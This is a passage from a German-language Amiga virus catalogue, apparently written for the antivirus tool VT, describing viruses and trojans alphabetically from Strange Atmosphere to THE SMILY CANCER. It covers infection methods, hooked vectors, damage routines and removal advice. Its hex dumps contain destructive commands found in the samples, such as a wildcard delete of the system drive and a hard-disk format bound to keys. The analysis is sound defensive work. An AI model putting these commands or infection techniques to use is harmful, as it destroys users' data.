  5675.            6e203337 2e352028 32302e35 2e393229 n 37.5 (20.5.92)
  5676.         Diese Versionsnummer kenne ich nicht. Sie sollten dieses
  5677.         assign-File loeschen und ein Original neu aufspielen.
  5678.         Da assign fast in jeder startup-sequence vorkommt, wird das
  5679.         Teil nach jedem Reset gestartet.
  5680.         VT bietet loeschen an.
  5681.         Typ C :             assign    Laenge:  4488 Bytes
  5682.  
  5683.    - Strange Atmosphere   Linkvirus
  5684.         Ab KS 2.04  (Test auf $25)
  5685.         Verbogener Vektor: LoadSeg
  5686.         Nicht resetfest
  5687.         Fileverlaengerung hinter den 1.Hunk: 1232 Bytes
  5688.         Ueberlaeuft 3E8, 3F0, 3F1-Hunks.
  5689.         Decodiert ist im Linkteil zu lesen:
  5690.            2d2b2a20 53747261 6e676520 41746d6f -+* Strange Atmo
  5691.            73706865 7265205b 674f4f64 5d202a2b sphere [gOOd] *+
  5692.         gOOd kann im Programm durch eViL ersetzt werden.
  5693.         VT versucht den Ausbau.
  5694.         Ablauf:
  5695.         Test auf Medium ok
  5696.         4 Block frei
  5697.         File ausfuehrbar (3F3)
  5698.         3E9-Hunk wird gefunden.
  5699.         Erste Hunklaenge stimmt mit $14-Fileeintrag ueberein.
  5700.         File groesser als #2600 Bytes.
  5701.         File kleiner (In Abhaengigkeit von Speichermediumgroesse)
  5702.         als #30000 Bytes oder #290000 Bytes.
  5703.         File beginnt nicht mit "v" oder "V".
  5704.         Der zweite Test auf ".l" im Filenamen (library) funktioniert
  5705.         bei meinen Tests nicht. Das Library-Verzeichnis wurde ver-
  5706.         seucht (mit Proz.68030) .
  5707.         Test auf File noch nicht befallen.
  5708.         Verseuchung:
  5709.         Das Teil linkt sich hinter den ersten Hunk.
  5710.         Es wird nach $4EAE (jsr -xyz(a6) gesucht. Dies darf nicht mehr
  5711.         als $7FF0 vom Hunkende entfernt sein. Wird ersetzt durch
  5712.         $4EBAabcd (jsr Virusbeginn).
  5713.         Schaeden in Abhaengigkeit von $DFF006 und/oder einer Zaehlzelle:
  5714.         - Linkversuch siehe oben
  5715.         - Das File wird auf #10 Bytes gekuerzt und mit Muell gefuellt.
  5716.           Da ist NICHTS mehr zu retten.
  5717.         - In das File sollen ENDLOS immer wieder #10 Bytes geschrieben
  5718.           werden. Da ist nichts mehr zu retten.
  5719.         - Cool-Vektor wird verbogen, ein Reset ausgefuehrt UND DoIo-Vektor
  5720.           verbogen. Das trackdisk.device wird NICHT gefordert. Es sollen
  5721.           in einer ENDLOS-Schleife immer wieder #1024 Bytes Muell Beginn
  5722.           mit Block 0 (BB ODER RIGID !!!!!) geschrieben werden. Aber Sie
  5723.           haben doch bestimmt Zylinder 0 Ihrer Festplatte auf Diskette
  5724.           gesichert. Und ein verbogener DoIo-Vektor mahnt Sie sicherlich
  5725.           auch zur Vorsicht. Das kennen Sie ja von "alten" BB-Viren.
  5726.         - "Nach einem Warmstart hatte ich eine erschreckende Schwarz-Rot-
  5727.           Goldene Fahne auf meinem Monitor." (Hinweis von M. R. Danke!!!)
  5728.           Stimmt. Diese Routine ist im Linkteil vorhanden, wurde aber bei
  5729.           meinen Tests nicht ausgeloest, da die Bedingungen (s.o) zufaellig
  5730.           nie gestimmt haben.
  5731.         Allgemeine Hinweise: (fuer SEHR STARKE Verseuchung)
  5732.         Ueberlegen Sie bitte, ob es nicht sinnvoller ist, einzelne Unter-
  5733.         verzeichnisse ( z.B. c ) voellig neu auf die Festplatte aufzu-
  5734.         spielen.
  5735.         Falls Sie unbedingt eine Rettung durchfuehren muessen, dann gehen
  5736.         Sie bitte mit VT-Filerequester in die einzelnen Unterverzeichnisse
  5737.         Ihrer Festplatte. VT bewegt sich dann nur in dem gewaehlten Unter-
  5738.         verzeichnis und arbeitet schneller. Sp->File->SP und dann Unterver-
  5739.         zeichnis waehlen. Danach DirFTest.
  5740.  
  5741.  
  5742.    - Suntronic       Cool, DoIo, nur Kick1.2 da absolute ROM-Einspruenge
  5743.                      Vermehrung ueber BB   , immer $7FA00
  5744.                      Suntronic-Text im BB sichtbar
  5745.  
  5746.    - SuperBoy     Cool, im Prg DoIo, im Speicher immer ab $7EC00
  5747.          Vermehrung ueber BB
  5748.          Alertmeldung mit  .... The Famous SuperBoy
  5749.  
  5750.  
  5751.    - Surprise-Trojan   Zerstoerungsfile  Laenge ungepackt: 39296 Bytes
  5752.        Name uebernommen. Soll sich nach Fremdaussagen auf eine Party
  5753.        beziehen, auf der das Teil das erste Mal aufgetaucht ist.
  5754.        SOFORT loeschen
  5755.        Keine verbogenen Vektoren
  5756.        Verwendet Exec-Sprungbefehle, die erst ab KS2.04 existieren.
  5757.        Das File besteht aus der Zerstoerungsroutine und um eine File-
  5758.        laenge zu erreichen, die ein Demo glaubhaft macht aus 98%
  5759.        wwwww-Muell.  s.u.
  5760.        Schaden:
  5761.        Sucht nach scsi.device Unit 0 UND 1.
  5762.        Falls gefunden, werden $800 (= 4 Block) in den Rigid-Bereich
  5763.        geschrieben. Sie sollten in diesem Fall ein Backup des Rigid-
  5764.        bereichs ihrer Festplatte haben.
  5765.        Im File und spaeter im Rigid-Bereich ist zu lesen:
  5766.           fd6c4e75 5244534b 00000040 c9699f9f .lNuRDSK...@.i..
  5767.            ;.....                                 ^^^^ Rigid-Beginn
  5768.           00000000 5375636b 204d6520 4f726761 ....Suck Me Orga
  5769.           6e697a65 72732020 20202020 20202020 nizers
  5770.            ;.....
  5771.           00000000 50415254 00000040 b3d956c7 ....PART...@..V.
  5772.           00000007 ffffffff 00000001 00000000 ................
  5773.           00000000 00000000 07467563 6b4f6666 .........FuckOff
  5774.           45000000 00000000 00000000 00000000 E...............
  5775.            ;.....
  5776.           00000000 73637369 2e646576 69636500 ....scsi.device.
  5777.           77777777 77777777 77777777 77777777 wwwwwwwwwwwwwwww
  5778.  
  5779.  
  5780.    - SWiFTER-Trojan  File Zerstoerung
  5781.        Laenge gepackt:  106496
  5782.        Laenge entpackt: 215448
  5783.        Keine verbogenen Vektoren
  5784.        Keine Vermehrung
  5785.        VT bietet Loeschen an
  5786.        Nach FileID: ein Spiel
  5787.        In Wirklichkeit:
  5788.         Vor ein IFF-Bild wurden einige Dos-Routinen gesetzt. Diese
  5789.         Dos-Routinen haben Zerstoerungsfunktionen.
  5790.        Im entpackten File ist zu lesen:
  5791.                             733a7374 61727475         s:startu
  5792.           702d7365 7175656e 63650063 3a646972 p-sequence.c:dir
  5793.           00633a63 6f707900 633a6564 00633a64 .c:copy.c:ed.c:d
  5794.           656c6574 6500636f 70792030 30332e64 elete.copy 003.d
  5795.           61742073 3a007265 6e616d65 20733a30 at s:.rename s:0
  5796.           30332e64 61742073 3a737461 72747570 03.dat s:startup
  5797.           2d736571 75656e63 65003030 312e6461 -sequence.001.da
  5798.           74204b45 594d4150 533a2022 22003030 t KEYMAPS: "".00
  5799.           322e6461 74203030 302e6461 7400464f 2.dat 000.dat.FO
  5800.        Es wird also eine neue startup-s. geschrieben, die eine Delete-
  5801.        Funktion enthaelt (wirksam erst nach Reset) L: 73 Bytes:
  5802.           64656c65 74652073 79733a23 3f20616c delete sys:#? al
  5803.           6c0a3b20 7a786a62 676d6d6b 65757775 l.; zxjbgmmkeuwu
  5804.           39333233 2c746e63 48414841 21204841 9323,tncHAHA! HA
  5805.           48412179 62657476 63686564 74697469 HA!ybetvchedtiti
  5806.           79726367 64220a0a 0a00              yrcgd"....
  5807.        Aber!!! Es wird auch eine neue keymap aktiviert, deren Tastatur-
  5808.        belegung gefaehrliche Sequenzen enthaelt L: 1972 Bytes:
  5809.           5a020402 1a080122 01230124 4b455942 Z......".#.$KEYB
  5810.           204b494c 4c45523a 204b4152 4c204552  KILLER: KARL ER
  5811.               ;.....
  5812.           1d040521 464f524d 41542044 45564943 ...!FORMAT DEVIC
  5813.           453d4448 303a204e 414d453d 31205120 E=DH0: NAME=1 Q
  5814.        Loeschen Sie bitte ALLE Teile.
  5815.  
  5816.  
  5817.    - SwiftWare   siehe bei: Devil_V8_B.Door
  5818.          im File ist zu lesen:
  5819.            4E5D4E75 0C092020 53776966 74576172 N]Nu..  SwiftWar
  5820.            65207625 642E2564 202D2000 1B5B313B e v%d.%d - ..[1;
  5821.            25646D00 00427920 4A616262 61682026 %dm..By Jabbah &
  5822.            20504F57 001B5B25 646D0000 202D2054  POW..[%dm.. - T
  5823.            6F702055 706C6F61 64657220 5574696C op Uploader Util
  5824.  
  5825.    - Switch-Off    anderer Name: Joshua 2 s.o.
  5826.  
  5827.    - Suicide-Virus   BB   immer ab $7E120, Kicktag, KickChecksum,
  5828.        Supervisor , KS2.04: GURU
  5829.        Fordert trackdisk.device NICHT .
  5830.        Kodiert mit Byte aus $DFF006   eor.b d1,(a0)+  jeden BB fuer
  5831.        Vermehrung neu.
  5832.        Meldet sich nicht .
  5833.        Schaeden und Vermehrung: BB
  5834.        Namensbegruendung:  dekodiert ist im Speicher zu lesen:
  5835.            3e3e2053 75696369 6465204d 61636869 >> Suicide Machi
  5836.            6e652062 79204d41 5820696e 2032342e ne by MAX in 24.
  5837.            30392e31 39393220 3c3c0000 2c790000 09.1992 <<..,y..
  5838.  
  5839.    - SUMPF.Prg (L)  File  Laenge: 952 Bytes
  5840.        Wird als Scherz-Programm weitergegeben. Als ob es nicht genug
  5841.        Aerger mit den Viren gaebe. Wird von VT erkannt und Loeschen
  5842.        Sie bitte das Teil sofort. Bitte schauen Sie auch die startup-
  5843.        sequence an. Von der Definition natuerlich kein Virus, da keine
  5844.        Vermehrung. Verbiegt $6c und zurueck. Der Originalwert von $6c
  5845.        kann von dem Programm bei Prozessoren, die mit VecPage arbeiten,
  5846.        NICHT zurueckgesetzt werden. A4000/40: Programm laeuft
  5847.        Es wird mit DisplayAlert ein Text ausgegeben:
  5848.      Warnung !! Zuviele Befehle in den Menüs! Arbeitet da ein Hard-Virus ?!
  5849.                      usw. ersparen Sie mir den Rest.
  5850.  
  5851.    - SuperNovaKiller-Virus   File  siehe bei PHANTOM-Inst.
  5852.  
  5853.    - Sysinfo  Trojan      Zerstoerung ???????
  5854.        Filename: Sysinfo_V2.2
  5855.        Laenge gepackt:  3928 Bytes
  5856.        Laenge entpackt: 5656 Bytes
  5857.        KEIN verbogener Vektor
  5858.        KEINE Vermehrung
  5859.        Soll BBS loeschen siehe unten
  5860.        Vorsicht !!!!!
  5861.        Ich kenne ein SysInfo_V1.1 das sich nur in einigen Bytes unter-
  5862.        scheidet und den Zerstoerungsstring NICHT enthaelt !!!!
  5863.        Es besteht die Gefahr, dass es zu FEHLERKENNUNGEN kommt !!!
  5864.        Die Zerstoerungs-Funktion konnte ich bei Tests auf keinem Amiga-Typ,
  5865.        mit dem ich testen kann, ausloesen. Warum VT das GEPACKTE Teil
  5866.        dennoch erkennt ??? Damit die Erbsenzaehler ruhiger schlafen
  5867.        koennen.
  5868.            Sysinfo_v1.1 Orig.           Sysinfo_v2.2  Fake
  5869.            793f0000 0d0a5379 y?....Sy : 793f0000 0d0a5379 y?....Sy
  5870.            7374656d 496e666f stemInfo : 7374656d 496e666f stemInfo
  5871.            2056312e 310d0a00  V1.1... : 2056322e 320d0a00  V2.2...
  5872.            ;......
  5873.            3a320000 64656c65 :2..dele : 3a320000 64656c65 :2..dele
  5874.            74652054 3a330000 te T:3.. : 74652042 42533a23 te BBS:#
  5875.            64656c65 74652054 delete T : 3f20616c 6c202054 ? all  T
  5876.            3a340000 000003f2 :4...... : 3a340000 000003f2 :4......
  5877.  
  5878.    - SystemScan-Trojan  Zerstoerungsfile
  5879.        Eine Zuordnung zu COP-Varianten ist NICHT nachvollziehbar.
  5880.        Filename: scansystem
  5881.        Laenge ungepackt: 10720 Bytes
  5882.        Keine verbogenen Vektoren
  5883.        Keine Vermehrung
  5884.        Nicht resetfest
  5885.        Im File ist zu lesen:
  5886.           20537973 74656d53 63616e20 76302e36  SystemScan v0.6
  5887.           20627920 43686563 6b496e20 2120696e  by CheckIn ! in
  5888.           20313939 35007700 20537973 74656d53  1995.w. SystemS
  5889.             ;.....
  5890.           63616e20 53797374 656d204c 69627261 can System Libra
  5891.           72696573 20210a00 5359533a 4c696273 ries !..SYS:Libs
  5892.             ;.....
  5893.           5359533a 4655434b 21007700 2043616e SYS:FUCK!.w. Can
  5894.        Ueber Cli-Ausgabe wird ein Test vorgetaeuscht. In Wirklichkeit
  5895.        werden in c, devs, l, libs und s alle Files geloescht. Um eine
  5896.        Undelete-Funktion zu verhindern, wird ein File FUCK! (teil-
  5897.        weise sehr gross) geschrieben, das den urspruenglichen Inhalt
  5898.        der geloeschten Files ueberschreiben soll. Dieses File ent-
  5899.        haelt in Wiederholungen den sichtbaren Text von systemscan.
  5900.        Leider keine Rettung moeglich.
  5901.        VT bietet nur loeschen an.
  5902.  
  5903.  
  5904.    - T.ET.E   BB Virus   anderer Name:BB-Prot     Zombi 1 Clone  s.u.
  5905.        Unterschied zu Zombi:
  5906.        versucht beim Booten durch die XCopy-Meldung
  5907.            NO VIRUS ON BOOTBLOCK   zu taeuschen.
  5908.        Die codierte Zombi-Meldung (intuition) wurde ueberschrieben.
  5909.        Schreibt in den zerstoerten  Rootblock als Diskname:
  5910.         01b0: 07542e45 542e4520 00000000 00000000 .T.ET.E ........
  5911.        Im Virus-BB ist zu lesen:
  5912.            4ef90007 a0363e42 422d5072 6f742062 N....6>BB-Prot b
  5913.            79205420 4520696e 20313200 30360031 y T E in 12.06.1
  5914.            3939353c 0007ee00 0007ee50 2001fffe 995<.......P ...
  5915.        Da beim Neuschreiben des RootBlocks, die ZOMBI-CheckSum (= falsch
  5916.        fuer T.ET.E) verwendet wird, duerfte wieder einmal ein An-
  5917.        faenger am Werk gewesen sein. 
  5918.  
  5919.    - TFC Evergreen 47.11  BB   Clone  s.u.
  5920.           Text geaendert.
  5921.            7069643a 000100cb 40544643 20457665 pid:....@TFC Eve
  5922.            72677265 656e2020 56697275 73203437 rgreen  Virus 47
  5923.            2e313100 01005070 49742069 73206120 .11...PpIt is a
  5924.             ;....                  
  5925.            20202020 20202020 00010020 e828312e         ... .(1.
  5926.            2031302e 20313939 33292020 20202020  10. 1993)
  5927.  
  5928.  
  5929.    - T.F.C. Revenge V1.03  Clone Extreme s.o.
  5930.           Text geaendert und Text im BB verschoben  
  5931.            000100cb 40542e46 2e432e20 52657665 ....@T.F.C. Reve
  5932.            6e676520 56697275 73205631 2e303300 nge Virus V1.03.
  5933.             ;....
  5934.            7265772c 2030362e 30362e31 39393120 rew, 06.06.1991
  5935.  
  5936.    - T.F.C. Revenge V2.14
  5937.           Versionsnummer und Datum geaendert, Rest s.o.    
  5938.            000100cb 40542e46 2e432e20 52657665 ....@T.F.C. Reve
  5939.            6e676520 56697275 73205632 2e313400 nge Virus V2.14.
  5940.             ;....
  5941.            7265772c 2032372e 30382e31 39393120 rew, 27.08.1991
  5942.  
  5943.    - T.F.C. Revenge LoadWB     File, Laenge ungepackt: 2804 Bytes
  5944.       Fuehrt LoadWB-Befehl aus und legt T.F.C. Revenge BB im Speicher
  5945.       ab. Verbogene Vektoren siehe bei Extreme.
  5946.       Vermehrung nur als Bootblock moeglich.
  5947.  
  5948.    - TAI-Virus   BB  anderer Name: SCA-TAI-Virus  s.o.
  5949.  
  5950.    - TAI2-Virus  BB  anderer Name: MAD2-TAI2-Virus s.o.
  5951.  
  5952.    - TAI3-FORPIB-Virus  BB  s.o.
  5953.       Text geaendert
  5954.            444f5300 b8e19b72 54414933 6000003e DOS....rTAI3`..>
  5955.            54686973 20697320 6120426f 6f746c61 This is a Bootla
  5956.            64657220 616e6420 416e7469 76697275 der and Antiviru
  5957.            73212044 6f6e7420 6b696c6c 20697420 s! Dont kill it
  5958.            5654322e 36303a00 00000253 48e77f7f VT2.60:....SH.
  5959.       Hinweis 28.10.93:
  5960.            - Zu diesem Zeitpunkt ist VT2.57 aktuell
  5961.            - Ich habe fuer VT noch NIE (und habe es auch nicht vor!!!!),
  5962.              einen speziellen BB programmiert. Lassen Sie sich also
  5963.              bitte nicht verwirren. Danke
  5964.  
  5965.    - TAI4-TimeBomb.V  BB   TimeBomb V1.0-Clone s.u.
  5966.            14202048 61766520 61206e69 63652064 .  Have a nice d
  5967.            61792020 536f7272 7920204c 6f6f6b20 ay  Sorry  Look
  5968.            666f7220 542e412e 492e2020 74686520 for T.A.I.  the
  5969.            62657374 2e2e0001 00000000 42b90007 best........B...
  5970.  
  5971.    - TAI5-BB  s.o. DUMDUM-Clone
  5972.  
  5973.    - TAI6 BB und File s.o CCCP-Clone
  5974.  
  5975.    - TAI7 BB  s.o LAMER1-Clone
  5976.       Das Teil wird von VT als BB nur als LAMER erkannt, da nicht einmal
  5977.       der Zerstoerungstext LAMER geaendert wurde.
  5978.  
  5979.    - TAI7-Inst.   Laenge gepackt: 2936 Bytes  Laenge entpackt: 4176 Bytes
  5980.       Namensbegruendung: s.u.
  5981.       An loadwb wurde mit Hunklab ein BootJob-File gehaengt.
  5982.       In diesem BootJob-File wurde der Programmierername geaendert und
  5983.       es enthaelt einen LAMER1-BB oder einen anderen Virus.BB
  5984.       Lesbarer Text:
  5985.            2e2e2ea7 2e3a2825 26372954 2e412e49 .....:(%&7)T.A.I
  5986.            2e30372e 3a2c2e2e 2e2e2039 2e2ea724 .07.:,.... 9...$
  5987.            32727472 61636b64 69736b2e 64657669 2rtrackdisk.devi
  5988.       Gepackt sollte VT loeschen anbieten.
  5989.       Entpackt sollte VT Ausbau anbieten.
  5990.       Vorsicht: Im gepackten Zustand koennte VT das File verwechseln.
  5991.       Entpacken Sie das File dann erst zur Sicherheit mit einem ge-
  5992.       eigneten Entpacker. Danke
  5993.  
  5994.    - TAI8 BB   s.o. 16BIT-Crew Clone
  5995.  
  5996.    - TAI9 BB   s.o. DAT 89 Clone
  5997.  
  5998.    - TAI10-Inst.  BB-Installer   Laenge Virusteil: 1336 Bytes
  5999.       Im Virusteil ist zu lesen:
  6000.            2eff2127 54414920 3130002d 1c535553 ..!'TAI 10.-.SUS
  6001.       Verwendet absolute Speicheradressen, die nicht in jedem Amiga
  6002.       vorhanden sind. Ich habe auf JEDER Maschine, auf der ich das Teil
  6003.       ausprobieren konnte, nur den GURU gesehen. Falls jemand mehr
  6004.       "Glueck" hat, bitte ich um eine Nachricht. Danke
  6005.       Am File sollte das Teil erkannt werden und VT sollte Ausbau an-
  6006.       bieten. Das Teil soll einen TAI10-CLONK.BB installieren (s.u.) .
  6007.  
  6008.       Hinweis 21.01.94: Es ist ein aehnlicher Link an ein File aufge-
  6009.       taucht. Soll VirusSlayer installieren. Wird ebenfalls als TAI10-
  6010.       Inst. erkannt. Da die Routine gleich ist, koennte ein Programm,
  6011.       das diese Arbeit macht, existieren ??????
  6012.  
  6013.    - TAI10-CLONK-Virus  BB   CLONK-Virus s.u.
  6014.       Nur Text geaendert:
  6015.            20746f20 6b696c6c 20626f6f 74766972  to kill bootvir
  6016.            75732e2e 2eff2127 54414920 3130002d us....!'TAI 10.-
  6017.            1c535553 50494349 4f555320 424f4f54 .SUSPICIOUS BOOT
  6018.            424c4f43 4b20464f 554e442e 2e2e00c0 BLOCK FOUND.....
  6019.  
  6020.    - TAI11 Compu3-Clone   File  Laenge 592  Rest s.o. CompuPhagozyte 3
  6021.       Namensbegruendung:
  6022.            20542041 20492020 31312020 202e2e2e  T A I  11   ...
  6023.  
  6024.    - TAI13-BB  4 Bloecke  Glasnost-Clone  s.o.
  6025.       Wird von VT beim BB-Test als Glasnost erkannt.
  6026.       In Block 4 ist uncodiert zu lesen:
  6027.            646f732e 6c696272 61727900 20542e41 dos.library. T.A
  6028.            2e492e31 333c0000 002e5380 43ec000c .I.13<....S.C...
  6029.  
  6030.    - Taipan-Chaos    anderer Name: Chaos  s.o.
  6031.       siehe auch: Chaos, Taipan-Lameblame, CHEATER HIJACKER, POLISH,
  6032.  
  6033.    - Taipan-LameBlame  anderer Name: LameBlame  s.o.
  6034.       siehe auch: Chaos, Taipan-Chaos, CHEATER HIJACKER, POLISH,
  6035.  
  6036.    - Target   cool,  im Prg. DoIo , immer $7ec00
  6037.       schreibt auf jede nicht schreibgeschuetzte Disk, die in Block
  6038.       880 ab $1b0/1 (=Diskname)  eine bestimmte Zeichenfolge
  6039.       enthaelt, ab Track 80 bis Ende (mal was Neues) sinnlose Daten
  6040.       Ursprungsprogramm:target.install (Malta)
  6041.  
  6042.    - tdtj-Trojan   Zerstoerungsfile
  6043.          Bekannte Filenamen:  BlueSky1.exe         40796 Bytes
  6044.                               FAIRLIGHT-1996.exe   40796 Bytes
  6045.                               lha20reg.exe         36088 Bytes
  6046.               Wobei BlueSky und Fairlight nur andere Namen fuer das
  6047.               GLEICHE File sind.
  6048.          Keine verbogenen Vektoren
  6049.          Nicht resetfest
  6050.          Im File ist zu lesen:
  6051.            00000000 00007464 746a2f65 66776a64 ......tdtj/efwjd
  6052.            6600                                f.
  6053.          Wenn Sie mit -1 arbeiten, ergibt sich scsi.device .
  6054.          Schaden:
  6055.          Versucht scsi.device Unit 0 zu oeffnen und ab Block 0 jeden
  6056.          Block in einer Schleife zu ueberschreiben.
  6057.          Das MUSS auffallen !!!
  6058.  
  6059.    - TeleCom-Virus   File   Laenge: 756 Bytes
  6060.       Cool immer $C71082, im Programm noch DoIo und FindRes .
  6061.       Braucht Execbase im Speicher ab $C00000 .
  6062.       Nur mit KS1.3, da absolute ROM-Einspruenge .
  6063.       Namensbegruendung:
  6064.       Decodiert mit eori.b #$27,(a1)+ ist im Speicher zu lesen:
  6065.            732f7374 61727475 702d7365 7175656e s/startup-sequen
  6066.            63650000 2054656c 65436f6d 20d80000 ce.. TeleCom ...
  6067.       Vermehrung:
  6068.        -Schreibt in startup-sequence 1.Zeile $A00A . Also den
  6069.         nichtsichtbaren Filenamen $A0 und ein Return.
  6070.        -Kopiert sich selbst ins Root-Verzeichnis mit Filename $A0.
  6071.       Einfach loeschen und in startup-sequence mit einem Editor
  6072.       die 1.Zeile loeschen.
  6073.       Hinweis: Der unsichtbare Filename $A0 wird auch von BGS9-3
  6074.       fuer das verschobene Originalprogramm verwendet. Es koennte
  6075.       also zu Verwechslungen kommen.
  6076.  
  6077.    - Telstar   Cold, Cool, Zaehlzelle $C0
  6078.      ganz gemein, taeuscht durch Text Virusprotector 6.0 vor, entschluesselt
  6079.          (neg.b) BBteile nach $7fc00, jeder 4/2.Reset Graphikausgabe (holl.
  6080.          Flagge und Text u.a. Telstar), keine Vermehrungsroutine gefunden.
  6081.  
  6082.    - Termigator: Kick 1.2 (da absolute ROM-Einspruenge)
  6083.          immer $7f4d0, Cool und DoIo
  6084.          entschluesselte Alertmeldung:
  6085.          Only the TERMIGATOR'VIRUS makes it possible! Bye!...
  6086.          Vermehrung: ueber BB
  6087.  
  6088.    - Terrorists     PrgFileVirus  Laenge 1612 Bytes
  6089.          KickMem, KickTag, KickCheckSum
  6090.          Textausgabe mit GraphikRoutine
  6091.          nimmt Namen des 1.Files in der Startup an
  6092.          verschiebt OrigPrg ins Hauptverzeichnis
  6093.          (unsichtbar A0202020A02020A020A0A0)
  6094.          Vermehrung: jede nichtschreibgeschuetzte Disk mit Startup
  6095.          im PrgFile sichtbar: TTV1
  6096.          schwarzer Hintergrund, weisse Schrift, zeilenweise
  6097.  
  6098.                   THE NAMES HAVE BEEN CHANGED
  6099.                   TO PROTECT THE INNOCENT...
  6100.                   THE TERRORISTS HAVE YOU UNDER CONTROL
  6101.                   EVERYTHING IS DESTROYED
  6102.                   YOUR SYSTEM IS INFECTED
  6103.                   THERE IS NO HOPE FOR BETTER TIMES
  6104.                   THE FIRST TERRORISTS VIRUS !!!
  6105.          Hinweis: es wird ein unsichtbares File (Name s.o.) weiterge-
  6106.             geben mit der Laenge #64 und dem Inhalt "Protection file!".
  6107.             Dieses File soll einen Terrorists-Befall der Disk verhindern.
  6108.          Clone: NoVi
  6109.  
  6110.    - TETRIS-COP-Trojan  Zerstoerung  Laenge: 21244 Bytes
  6111.          siehe bei COP-TypK-Trojan
  6112.  
  6113.    - Text-Hunk am Anfang
  6114.          Dieser Text-Hunk ist KEIN Virus !!!!!!!!!
  6115.          Aber die Filestruktur wird so veraendert, dass Link- und File-
  6116.          Viren nicht mehr gefunden werden koennen. Negativbeispiel siehe
  6117.          unten. Ueber Dos.library-Funktionen erfolgt eine Textausgabe
  6118.          ins Cli .
  6119.          Beispiel:
  6120.               4cdf7fff 4ef90000 0000646f 732e6c69 L..N.....dos.li
  6121.               62726172 79000000 06550000 001d0000 brary....U......
  6122.               069e0c20 20202020 5f5f2020 20202020 ...     __
  6123.               20202020 5f5f2020 20202020 20205f5f     __        __
  6124.               20202020 20202020 20202020 20202020
  6125.               20205f20 5f5f5f20 20202020 20202020   _ ___
  6126.               20202020 20202020 202f5c0a 205f5f5f          /\. ___
  6127.               2f20205c 5f5f5f5f 5f5f5f5f 2f20205c /  \________/  \
  6128.          Diese Hunks scheinen fuer Boxenwerbung verwendet zu werden.
  6129.          Die Erzeugerprogramme sind mir unbekannt. Falls Sie mir helfen
  6130.          wollen, schicken Sie mir bitte diese Programme zu. Danke !!
  6131.          Falls Sie weitere Text-Hunk-Varianten finden, die VT noch nicht
  6132.          kennt, schicken Sie mir bitte mehrere Beispiele zu. Danke !!
  6133.          VT bietet Ausbau an, weil ich in den mir bekannten Beispielen,
  6134.          keine Routinen gefunden habe, die fuer das eigentliche File zur
  6135.          Lauffaehigkeit notwendig gewesen waeren. (Solche Routinen
  6136.          koennten sein: Fastmem und/oder Cache aus).
  6137.          Arbeiten Sie zur Sicherheit mit einer Kopie. Danke !!
  6138.          Fuehren Sie nach dem Text-Hunk-Ausbau UNBEDINGT einen KOMPLETTEN
  6139.          Test durch, da erst jetzt Viren erkannt werden koennen.
  6140.          Negativ-Beispiel:
  6141.          DENISTRO.EXE
  6142.          Laenge mit Text-Hunks und Commander-Virus  71800 Bytes
  6143.          Laenge ALLES ausgebaut                     64844 Bytes
  6144.          In diesem File erkennt im Moment (25.11.94) beim Filetest
  6145.          KEIN AntiVirusProgramm den Commander-Virus. Ich gehe aber davon
  6146.          aus, dass bei den Updates das Problem behoben wird.
  6147.          VT2.68 (also schon zwei Monate alt) findet den Commander-Virus
  6148.          aber schon beim BlockKetteTest.
  6149.          Ziehen Sie bitte aus diesem Vorfall folgende Schluesse:
  6150.          - Formatieren Sie die RAD: lang nicht Quick
  6151.          - Entpacken Sie Archive aus Mailboxen in die RAD: und nicht ins
  6152.            RAM:
  6153.          - Geben Sie sich nicht mit einem Filetest zufrieden, sondern
  6154.            fuehren Sie auch einen BlockKetteTest durch.
  6155.  
  6156.  
  6157.    - THAHO8  BB     es ist KEIN Virus  Empfehlung: loeschen
  6158.          VT kennt: 21.10.92
  6159.          Die Format- und BB-Kopier-Routine im BB ab $1FE wird NIE er-
  6160.          reicht. Ueber Graphik wird auf schwarzem Hintergrund mit
  6161.          heller Schrift ausgegeben:
  6162.  
  6163.                  THAHO8 VIRUS V2.0
  6164.  
  6165.          Im BB ist zu lesen:
  6166.           00000000 54686973 20697320 74686520 ....This is the
  6167.           6D696768 74792054 6861686F 38205669 mighty Thaho8 Vi
  6168.           72757320 56322E30 21202045 61742073 rus V2.0!  Eat s
  6169.           6869742C 204C414D 45522120 20546861 hit, LAMER!  Tha
  6170.           686F2054 6861686F 20546861 686F2054 ho Thaho Thaho T
  6171.           6861686F 20546861 686F2054 6861686F haho Thaho Thaho
  6172.  
  6173.    - The FAT Stinkbomb 2  BB   EXTREME-Clone
  6174.          Bei mir FAT 2 Virus siehe oben
  6175.  
  6176.    - The FAT Stinkbomb 1  BB   TimeBomb V1.0-Clone
  6177.          Bei mir FAT 1 Virus siehe oben
  6178.  
  6179.    - The Return of STARCOM    siehe bei STARCOMReturn
  6180.  
  6181.    - THE SMILY CANCER   LinkVirus, verlaengert das Prg. um 3916 Bytes
  6182.          Fastmem ja, im Speicher immer ab $7F000, KickTag, KickCheckSum,
  6183.          SumKickData, im Prg. noch BeginIo und $6c = Vec3
  6184.          PrgTeile decodiert mit ror.b #2,d1 oder codiert mit rol.b #2,d1
  6185.          befaellt das erste File der startup-sequence,
  6186.          testet  n i c h t  auf Sonderzeichen im Filenamen,
  6187.          d.h. jedes File wird befallen
  6188.          nach 20 Vermehrungen:
  6189.          Mauszeiger aendert sich in gelben Kopf (smily) mit blauem Hut
  6190.          und Endlosausgabe einer roten Laufschrift:
  6191.    "????????.........."
  6192.    " HI THERE!!! A NEW AGE IN VIRUS MAKING HAS BEGUN!!!"
  6193.    " THANX TO US... THANKX TO: --- CENTURIONS ---  "
  6194.    " AND WE HAVE THE PLEASURE TO INFORM YOU THAT SOME"
  6195.    " OF YOUR DISKS ARE INFECTED BY OUR FIRST MASTERPIECE"
  6196.    " CALLED: ` THE SMILY CANCER `  "
  6197.    " HAVE FUN LOOKING FOR IT... AND STAY TUNED FOR OUR NEXT PRODUCTIONS.  "
  6198.    " CENTURIONS: THE FUTURE IS NEAR!"
  6199.    "                     "
  6200.  
  6201.    Ausserdem ist im decodierten Prg noch zu lesen:
  6202.    (erscheint nicht in der Laufschrift)
  6203.    HELLO HACKERS OUT THERE!! A NEW FORCE HAS BORN IN ITALY:
  6204.    --- CENTURIONS ---. OUR TEAM IS COMPOSED OF 2 GUYZ:
  6205.    ME & HIM.(AHAHHA!)
  6206.    THE AIM OF - - CENTURIONS - - IS JUST VIRUS MAKING..
  6207.    WE HAVE LOTTA FUN DOING THIS AND WE ALSO HOPE TO GIVE FUN TO THE
  6208.    KILLERS MAKERS (HI STEVE TIBBETT!) HAW! HAW! HAW!
  6209.     SIGNED: ME & HIM / CENTURIONS
  6210.    Hinweis: Ich besitze ein Smily-File mit vier Links
